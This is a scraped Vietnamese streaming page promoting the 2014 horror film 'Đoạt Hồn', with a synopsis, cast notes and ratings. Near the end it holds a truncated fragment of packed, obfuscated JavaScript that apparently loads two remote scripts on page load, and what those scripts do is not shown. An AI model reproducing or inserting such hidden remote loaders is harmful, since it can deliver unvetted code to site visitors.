Banner C1
Banner C1

Phim

Đoạt Hồn

Xem Phim Đoạt Hồn
315637 lượt xem

HD Phim Chiếu Rạp MớiPhim MaPhim Kinh Dị Phim Việt Nam

Đạo Diễn: Hàm Trần

Thời lượng: 110 Phút

Năm phát hành: 2014

Xem phimXem TrailerTải Phim

3.7
254 Star | 68 Rates
  • Các Diễn Viên Trong Phim
  • Nội Dung Phim

Đoạt Hồn là một bộ phim điện ảnh của đạo diễn Hàm Trần với sự tham gia của nam diễn viên chính Trần Bảo Sơn, hiện đang gây sốt trên báo chí. Bộ phim đã bắt đầu bấm máy tại gần khu vực tứ giác của Long Xuyên với những danh lam thắng cảnh tuyệt đẹp và lãng mạn không kém phần tâm linh u ám của rừng nguyên sinh.

Đoạt Hồn

Nội dung bộ Phim Đoạt Hồn xoay quanh cuộc đời của một người đàn ông tên Huy, ông có người con trai duy nhất nhưng vì do đi bơi với bạn trong hồ và đã chết đuối, quá đau khổ Huy trở nên điên dại suốt ngày lẩm bẩm nói chuyện một mình như người vô hồn, mọi người trong làng ai nấy thấy Huy liền xa lánh và bỏ chạy, ít có ai biết được Huy lại có khả năng nhìn thấy những oan hồn của những người đã khất vẫn còn vương vấn trên phàm trần.

Đoạt Hồn

Càng đi sâu vào bộ phim khán giả sẽ nhận thấy tính chân thực của nhân vật Huy do nam diễn viên Trần Bảo Sơn hóa thân, vì muốn tìm và gặp mặt oan hồn của con trai mình nên Huy đã mạo hiểm tính mạng vào rừng cấm, nơi mà dân làng xem như cấm địa của những hồn ma. Xem Phim Đoạt Hồn  Nói đến nam diễn viên Trần Bảo Sơn,

Đoạt Hồn

sau khi gặt hái thành công hình tượng trong bộ phim căn nhà trong hẻm anh bắt đầu dấn sâu vào điện ảnh nước nhà và tạm gác mọi hoạt động kinh doanh của mình. Bộ phim sẽ ra mắt khán giả Việt Nam vào năm 2014 này. Mọi thông tin chi tiết sẽ được chúng tôi liên tục cập nhật sớm nhất. Hy vọng các bạn sẽ thích bộ phim này.

Đoạt Hồn

Chúc các bạn xem phim vui vẻ!.

Xem phim '\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.0(\'2://8.3.1/5/6/7/g.9\');$.0(\'2://b.c.1/a/d.e?f=4\')',17,17,'
  • Trailer Phim
7.4
68
  • Phim Cùng Thể Loại

BÌNH LUẬN PHIM : Đoạt Hồn

Banner C1

User Online
Banner C1
Banner C1
loading...